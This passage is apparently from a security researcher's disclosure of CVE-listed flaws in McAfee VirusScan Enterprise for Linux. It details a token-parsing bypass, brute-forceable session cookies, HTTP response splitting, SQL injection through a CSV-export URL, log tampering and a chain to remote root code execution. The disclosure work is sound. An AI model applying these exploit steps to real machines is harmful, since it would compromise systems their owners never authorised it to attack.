<p>After confirming that the token worked on the original machine, I thought that the authentication tokens might be limited to a specific IP address. This would make writing an exploit more difficult, but it could still all be done via XSS using JavaScript in a victim’s browser.</p>

<p>When a user authenticates through the website, a message is passed via a unix-socket to the root service. The root service validates the credentials and returns its results to the webserver. To find what was going wrong when a remote machine used my cookie, I used <code class="language-plaintext highlighter-rouge">socat</code> to man-in-the-middle the socket to see the messages.</p>

<p>This script restarts nails and intercepts all of its communications on the socket:
<script src="https://gist.github.com/AndrewFasano/582620995c948a9abdfd213ac1a85e71.js"></script></p>

<p>Now we could see what was different between the two requests.</p>

<h4 id="valid-request">Valid request</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>&lt; 2015/07/30 11:14:28.119036 length=70 from=0 to=69
+OK welcome to the NAILS Monitor Service &lt;19224.2214.1438280068.161&gt;\r

2015/07/30 11:14:28.119326 length=54 from=0 to=53
auth 2259618965-19224.2214.1438280068.161-2259618965\r
&lt; 2015/07/30 11:14:28.119399 length=31 from=70 to=100
+OK successful authentication\r
2015/07/30 11:14:28.137344 length=66 from=54 to=119
cred 127.0.0.1/nails/1438280067/1438279968-checksum//0 127.0.0.1\r
&lt; 2015/07/30 11:14:28.137530 length=20 from=101 to=120
+OK credentials OK\r

</code></pre></div></div>

<h4 id="invalid-request">Invalid request</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>&lt; 2015/07/30 11:14:28.119036 length=70 from=0 to=69
+OK welcome to the NAILS Monitor Service &lt;19224.2214.1438280068.161&gt;\r

2015/07/30 11:14:28.119326 length=54 from=0 to=53
auth 2259618965-19224.2214.1438280068.161-2259618965\r
&lt; 2015/07/30 11:14:28.119399 length=31 from=70 to=100
+OK successful authentication\r
2015/07/30 11:14:28.137344 length=66 from=54 to=119
cred 127.0.0.1/nails/1438280067/1438279968-checksum//0 [ATTACKER IP]\r
&lt; 2015/07/30 11:14:28.137530 length=20 from=101 to=120
+ERR bad credentials\r
</code></pre></div></div>

<p>It looks like the webserver is sending the requester’s IP address in addition to their cookie when it makes an AUTH request. Although it’s a bit unusual, it’s not a terrible security decision.</p>

<p>Our cookie is being sent via a text-based protocol and after our cookie, there’s some number of spaces and the IP address. But if we modify this to make our cookie end with a space followed by the victim’s IP address and then a number of spaces, it will be parsed incorrectly.</p>

<p>Instead of having the message sent on the socket be:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>AUTH [cookie] [ATTACKER IP]
</code></pre></div></div>

<p>We’ll modify our cookie so the message sent is:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>AUTH [stolen cookie + VICTIM IP ] [ATTACKER IP]

</code></pre></div></div>

<p>The service incorrectly parses this line and believes that it’s reading a cookie sent from the victim’s IP address.</p>

<p>The full communication ends up looking like:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>&lt; 2015/07/30 11:14:28.119036 length=70 from=0 to=69
+OK welcome to the NAILS Monitor Service &lt;19224.2214.1438280068.161&gt;\r

2015/07/30 11:14:28.119326 length=54 from=0 to=53
auth 2259618965-19224.2214.1438280068.161-2259618965\r
&lt; 2015/07/30 11:14:28.119399 length=31 from=70 to=100
+OK successful authentication\r
2015/07/30 11:14:28.137344 length=66 from=54 to=119
cred 127.0.0.1/nails/1438280067/1438279968-checksum//0 127.0.0.1 10.0.0.130\r
&lt; 2015/07/30 11:14:28.137530 length=20 from=101 to=120
+OK credentials OK\r
</code></pre></div></div>

<hr />

<h3 id="vulnerability-8-cve-2016-8023-brute-force-authentication-tokens">Vulnerability 8 (CVE-2016-8023): Brute Force Authentication Tokens</h3>
<p>After seeing the previous cookie-parsing logic fail, I wanted to test how well the other cookie validation logic worked.</p>

<p>Here are a few sample values for the <code class="language-plaintext highlighter-rouge">nailsSessionId</code> cookies that were generated by logging in and out for the <strong>nails</strong> account:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>127.0.0.1/nails/1459548338/1459548277-checksum//0
127.0.0.1/nails/1459549661/1459549629-checksum//0
127.0.0.1/nails/1459549695/1459549629-checksum//0
</code></pre></div></div>

<p>Only two parts of the cookie seem to change between typical login attempts. The cookie format seems to be:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[host]/[username]/[SECRET1]/[SECRET2]-checksum//[Zero]
</code></pre></div></div>

<p>Where typical values are as follow:</p>

<table>
  <thead>
    <tr>
      <th>Variable</th>
      <th>Description</th>
      <th>Observed Values</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>[host]</td>
      <td>An IP Address</td>
      <td>0.0.0.0 or 127.0.0.1</td>
    </tr>
    <tr>
      <td>[username]</td>
      <td>The username of the logged-in user.</td>
      <td>nails</td>
    </tr>
    <tr>
      <td>[SECRET1]</td>
      <td>Unix time at which the cookie was assigned</td>
      <td>1435067777</td>
    </tr>
    <tr>
      <td>[SECRET2]</td>
      <td>Unix time at which the server was started</td>
      <td>1435066996</td>
    </tr>
    <tr>
      <td>[Zero]</td>
      <td>The number 0</td>
      <td>0</td>
    </tr>
  </tbody>
</table>

<p>While using a timestamp for a secret value is a bad idea since it could be brute-forced, using two in conjunction would normally make this difficult. Fortunately, that’s not the case here. Some basic testing found that the acceptable values for these fields differed significantly from what they were typically set to:</p>

<table>
  <thead>
    <tr>
      <th>Variable</th>
      <th>Acceptable Value</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>[host]</td>
      <td>IP address request is sent from</td>
    </tr>
    <tr>
      <td>[username]</td>
      <td>Any string</td>
    </tr>
    <tr>
      <td>[SECRET1]</td>
      <td>Any number</td>
    </tr>
    <tr>
      <td>[SECRET2]</td>
      <td>Unix time at which the server was started</td>
    </tr>
    <tr>
      <td>[Zero]</td>
      <td>Blank</td>
    </tr>
  </tbody>
</table>

<p>This leaves us with one value to brute-force; the time at which the server was started at. Starting at the current date and decrementing it until we’ve successfully authenticated can be done by modifying the <code class="language-plaintext highlighter-rouge">DATE</code> value in the following cookie:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[Attacker IP]/n/0/[DATE]-checksum//

</code></pre></div></div>

<hr />

<h3 id="vulnerability-9-cve-2016-8024-http-response-splitting">Vulnerability 9 (CVE-2016-8024): HTTP Response Splitting</h3>
<p>Users can export a CSV of all log data from the “System Events” page by clicking an export button which just makes a GET request.
<img src="/images/export_csv.png" alt="Export CSV" /></p>

<p>When this request is sent, one of the parameters is <code class="language-plaintext highlighter-rouge">info%3A0</code>. This parameter typically holds the value <code class="language-plaintext highlighter-rouge">multi%2Capplication%2Fvnd.ms-excel</code>. The server responds to this request with a header <code class="language-plaintext highlighter-rouge">Content-Type: application/vnd.ms-excel</code>. An attacker can create a link that responds with arbitrary headers by simply URL encoding newlines plus additional headers.
<img src="/images/splitting_req.png" alt="Splitting Request" />
<img src="/images/splitting_resp.png" alt="Splitting Response" /></p>

<hr />

<h3 id="vulnerability-10-cve-2016-8025-authenticated-sql-injection">Vulnerability 10 (CVE-2016-8025): Authenticated SQL Injection</h3>
<p>This system uses a SQLite database to store data about settings and previous scans. Every entry point to this database I looked at was vulnerable to SQL injections. This application appears to translate URL arguments into SQLite commands. Using the CSV-export function mentioned in the discussion of vulnerability 9, we can dump the <code class="language-plaintext highlighter-rouge">sqlite_master</code> table in CSV form simply by visiting a URL. The query <code class="language-plaintext highlighter-rouge">select * from sqlite_master;</code> is embedded in the URL:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>localhost:55443/0409/nails?pg=proxy&amp;tplt=-&amp;addr=127.0.0.1%3A65443&amp;mon%3A0=db+select+_show%3D%24*++_output%3Dcsv+_table%3Dsqlite_master+&amp;info%3A0=multi%2Capplication%2Fvnd.ms-excel
</code></pre></div></div>

<p><img src="/images/sql_db.png" alt="SQL DB" /></p>

<p>The database isn’t used for authentication, just to track which files have been scanned and the event log. After exploiting other vulnerabilities to compromise a machine, an attacker could use SQL injections to modify the event log to clean up their tracks.</p>

<p>The schema of this database is:</p>
<div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">"*"</span>
<span class="nv">"31-Dec-1969 16:00:00 (-08:00 UTC)"</span><span class="p">,</span><span class="nv">"nailsInfo"</span><span class="p">,</span><span class="nv">"nailsInfo"</span><span class="p">,</span><span class="nv">"4"</span><span class="p">,</span><span class="nv">"create table nailsInfo(attrib varchar(32) not null unique,	-- name of the attribute
                          val varchar(32),			-- string value
			  i_val integer				-- integer value
			 )"</span>
<span class="nv">"31-Dec-1969 16:00:00 (-08:00 UTC)"</span><span class="p">,</span><span class="nv">"(nailsInfo autoindex 1)"</span><span class="p">,</span><span class="nv">"nailsInfo"</span><span class="p">,</span><span class="nv">"3"</span><span class="p">,</span><span class="nv">""</span>
<span class="nv">"31-Dec-1969 16:00:00 (-08:00 UTC)"</span><span class="p">,</span><span class="nv">"counters"</span><span class="p">,</span><span class="nv">"counters"</span><span class="p">,</span><span class="nv">"5"</span><span class="p">,</span><span class="nv">"create table counters(i_lastUpdated integer not null, 	-- time the counters were last updated
			 i_scanned integer not null,		-- Number of objects scanned 
			 i_totalScanCpu integer not null,	-- Total CPU used for scanning (microseconds) 
			 i_excludes integer not null,		-- Number of excluded files 
			 i_ok integer not null,			-- Number of files scanned to be ok 
			 i_infected integer not null,		-- Number of objects that have been infected 
			 i_infections integer not null,		-- Number of of infections 
			 i_cleaned integer not null,		-- Number of objects that have been cleaned 
			 i_cleanAttempts integer not null,	-- Number of objects that have been queued for cleaning 
			 i_cleanRequests integer not null,	-- Number of clean requests from the scan sources 
			 i_repaired integer not null,		-- Number of repairs made 
			 i_possiblyCleaned integer not null,	-- Number of partial repairs made 
			 i_errors integer not null,		-- Number of failed scans not clean and not infected 
			 i_timeouts integer not null,		-- Number of scans that have timed out 
			 i_denied integer not null,		-- Number of process denied access 
			 i_deleted integer not null,		-- Number of cleans that resulted in deleting the file 
			 i_renamed integer not null,		-- Number of cleans that resulted on renaming the file 
			 i_quarantined integer not null,	-- Number of cleans that resulted on quarantining the file 
			 i_corrupted integer not null,		-- Number of corrupted items detected by scanning 
			 i_encrypted integer not null,		-- Number of encrypted items detected by scanning 
			 i_uptime integer not null,		-- Number of seconds since we started 
			 i_wait integer not null,		-- Number of objects waiting to be scanned 
			 i_busy integer not null,		-- Number of objects being scanned 
			 i_adds integer not null,		-- Number of objects that have been added to a queued entry 
			 i_cacheSize integer not null,		-- Number of entries in the cache 
			 i_cacheHits integer not null,		-- Number of cache hits 
			 i_cacheMisses integer not null,	-- Number of cache misses 
			 i_cacheInserts integer not null	-- Number of cache insertions 
			)"</span>
<span class="nv">"31-Dec-1969 16:00:00 (-08:00 UTC)"</span><span class="p">,</span><span class="nv">"schedule"</span><span class="p">,</span><span class="nv">"schedule"</span><span class="p">,</span><span class="nv">"9"</span><span class="p">,</span><span class="nv">"create table schedule(i_taskId integer primary key,    	-- an auto-increment column
                         taskName varchar(64) not null unique,	-- the name of the task
			 timetable varchar(255) not null,	-- the encoded string of when it runs
			 taskType varchar(16) not null,		-- upgrade, scan, report
			 taskInfo varchar(255),			-- information specific to the task
			 taskResults varchar(255),		-- results of the task
			 i_lastRun integer,			-- time last run
			 status varchar(8),			-- status of last run
			 progress varchar(255),			-- progress string
			 i_duration integer,			-- current duration of the task run
			 i_nextRun integer,			-- time next run
			 i_recurrenceCounter integer,		-- count scheduler invocations by cron
			 i_taskPid integer			-- pid of the task being run
			)"</span>
<span class="nv">"31-Dec-1969 16:00:00 (-08:00 UTC)"</span><span class="p">,</span><span class="nv">"(schedule autoindex 1)"</span><span class="p">,</span><span class="nv">"schedule"</span><span class="p">,</span><span class="nv">"8"</span><span class="p">,</span><span class="nv">""</span>
<span class="nv">"31-Dec-1969 16:00:00 (-08:00 UTC)"</span><span class="p">,</span><span class="nv">"errorClass"</span><span class="p">,</span><span class="nv">"errorClass"</span><span class="p">,</span><span class="nv">"12"</span><span class="p">,</span><span class="nv">"create table errorClass(errorClsNm varchar(16) not null unique)"</span>
<span class="nv">"31-Dec-1969 16:00:00 (-08:00 UTC)"</span><span class="p">,</span><span class="nv">"(errorClass autoindex 1)"</span><span class="p">,</span><span class="nv">"errorClass"</span><span class="p">,</span><span class="nv">"11"</span><span class="p">,</span><span class="nv">""</span>
<span class="nv">"31-Dec-1969 16:00:00 (-08:00 UTC)"</span><span class="p">,</span><span class="nv">"repository"</span><span class="p">,</span><span class="nv">"repository"</span><span class="p">,</span><span class="nv">"15"</span><span class="p">,</span><span class="nv">"create table repository(siteList blob, status int)"</span>
<span class="nv">"31-Dec-1969 16:00:00 (-08:00 UTC)"</span><span class="p">,</span><span class="nv">"scanLog"</span><span class="p">,</span><span class="nv">"scanLog"</span><span class="p">,</span><span class="nv">"16"</span><span class="p">,</span><span class="nv">"create table scanLog(i_logId integer primary key, 		-- an auto-increment column
			origin varchar(8) not null,		-- access or demand
			i_taskId integer,			-- references schedule.i_taskId
			i_objId integer,			-- an id to relate scan events on the same object
			i_tim integer not null,			-- UTC time it happened
			fileName varchar(255), 
			path varchar(255), 
			action varchar(16),
			virusName varchar(64),
			virusType varchar(16),			-- Unknown, Virus, App, Joke, Killed, Test, Trojan, Wannabee
			userName varchar(32),
			processName varchar(32)
		       )"</span>
<span class="nv">"31-Dec-1969 16:00:00 (-08:00 UTC)"</span><span class="p">,</span><span class="nv">"eventLog"</span><span class="p">,</span><span class="nv">"eventLog"</span><span class="p">,</span><span class="nv">"18"</span><span class="p">,</span><span class="nv">"create table eventLog(i_logId integer primary key,		-- an auto-increment column
                         origin varchar(8) not null,		-- system or task
			 i_taskId varchar(64),			-- references schedule.i_taskId
			 i_objId integer,			-- an id to relate events on the same object
			 i_tim integer not null,		-- UTC time it happened
			 errorClsNm varchar(16), 		-- references errorClass.errorClsNm
			 i_errorCode integer,			-- the error code
			 errorType varchar(8),			-- info or error
			 description varchar(255)
			)"</span>
</code></pre></div></div>

<hr />

<h3 id="bringing-it-all-together-remote-code-execution-as-root">Bringing it all Together: Remote Code Execution as Root</h3>
<p>To execute code as the root user on a remote machine:</p>
<ol>
  <li>Brute force authentication token using <a href="#vuln7">Vulnerability 7</a> and <a href="#vuln8">Vulnerability 8</a>.</li>
  <li>Start running a malicious update server.</li>
  <li>Send request with authentication token to update the update server using <a href="#vuln7">Vulnerability 7</a>.</li>
  <li>Force target to create a malicious script on their system using <a href="#vuln6">Vulnerability 6</a>.</li>
  <li>Send malformed request with authentication token to start virus scan but execute malicious script instead by using <a href="#vuln5">Vulnerability 5</a> and <a href="#vuln6">Vulnerability 6</a>.</li>
  <li>The malicious script is then run by the root user on the victim machine.</li>
</ol>

<p><em>Exploiting this vulnerability depends on the existence of a valid login token which is generated whenever a user logs into the web interface. These tokens are valid for approximately an hour after login.</em></p>

<h4 id="demo">Demo</h4>
<script src="https://gist.github.com/e8339d700a42416bd83cb1cf0a05e624.js"> </script>]]></content><author><name>Andrew Fasano</name></author><category term="Vulnerability Research" /><category term="McAfee" /><category term="Linux" /><category term="CVE" /><summary type="html"><![CDATA[A system running Intel’s McAfee VirusScan Enterprise for Linux can be compromised by remote attackers due to a number of security vulnerabilities. Some of these vulnerabilities can be chained together to allow remote code execution as root.]]></summary></entry></feed>